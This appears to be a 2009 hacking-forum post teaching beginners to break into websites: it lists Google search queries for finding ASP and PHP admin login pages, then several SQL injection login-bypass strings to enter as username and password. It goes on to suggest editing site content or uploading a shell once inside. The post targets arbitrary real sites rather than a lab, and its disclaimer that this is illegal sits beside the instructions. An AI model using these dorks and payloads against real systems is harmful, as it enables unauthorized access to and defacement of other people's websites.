This is too easy, you should have just posted the advanced version.
SQL injection is a way of..basicly loggin into sites (as admin) that you are not ment to have access to
First, please look over this list of google search terms I have made. Simple search the term on google and it's possible to find vulnerable websites this way:
(WITH OR WITHOUT QUOTES. YOU MAY CHANGE .ASP to .PHP BUT .ASP TENDS TO WORK BETTER)
Also, you can add keywords at the end of each search, to narrow down your search.
inurl:"admin.asp"
inurl:"adminlogin.asp"
inurl:"login/admin.asp"
inurl:"admin/login.asp"
inurl:"webadmin.asp"
inurl:"adminpanel.asp"
inurl:"administrator.asp"
inurl:"administrator/login.asp"
inurl:"panel/login.asp"
inurl:"church/admin.asp"
inurl:"websitelogin.asp"
inurl:"edit/login.asp"
inurl:"/administration/"
inurl:"/editsite"
inurl:"staff.asp" login
inurl:"/login/staff.asp"
inurl:"memberslogin.asp"
inurl:"memberlogin.asp"
inurl:"members/login.asp"
inurl:"owner/login.asp"
inurl:"administrate/login.asp"
inurl:"controlpanel.asp"
inurl:"siteadmin.asp"
inurl:"website/login.asp"
inurl:"admin.asp" login
inurl:"admin_login.asp" login
inurl:"login" "staff login"
inurl:"login" "admin login"
inurl:"login/admin.asp"
inurl:"login.asp" "staff only"
inurl:"administration.asp" "admin login"
inurl:"adminpage.asp"
inurl:"adminlogin.asp"
FIRST STEP
After searching on google with one of the terms on the supplied list, you will want to open all the pages one a single google page in seperate tabs.
After doing that, it's time to see if the login page is vulnerable to the simplest of MySQL injections. Simply type in this string as the username and password for the login form:
' or 'a'='a
There are other strings you can try to use if the one above doesn't work:<br>
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
SECOND STEP
If the login works, you now h ave unauthorized access to the website. If you're lucky, you will be able to find a content management system and edit the page. If they allow you to upload pictures/files you could also try ********* a shell (explained in another tutorial).
If the login doesn't happen to work, go to the next google page or try a different search term. Please remember this is the SIMPLEST type of "hacking" on the internet, and there aren't a lot of vulnerable websites. But at times I do get surprised at the lack of security on some websites.
(To one of the admins..i hope this site doesnt have this for of login if it does please remove this post..D
YES! IT IS ILLEGAL DONT BE STUPID SKIDDES!!!
Credits to DoesNotAfraid
BTW DoesNotAfraid also told us how to do advanced SQL injection if enough ppl are interested in this then i will make a post about the Advanced version of such =3
Last edited by h3lpless_alpaca; 08-07-2009 at 02:34 AM.
This is too easy, you should have just posted the advanced version.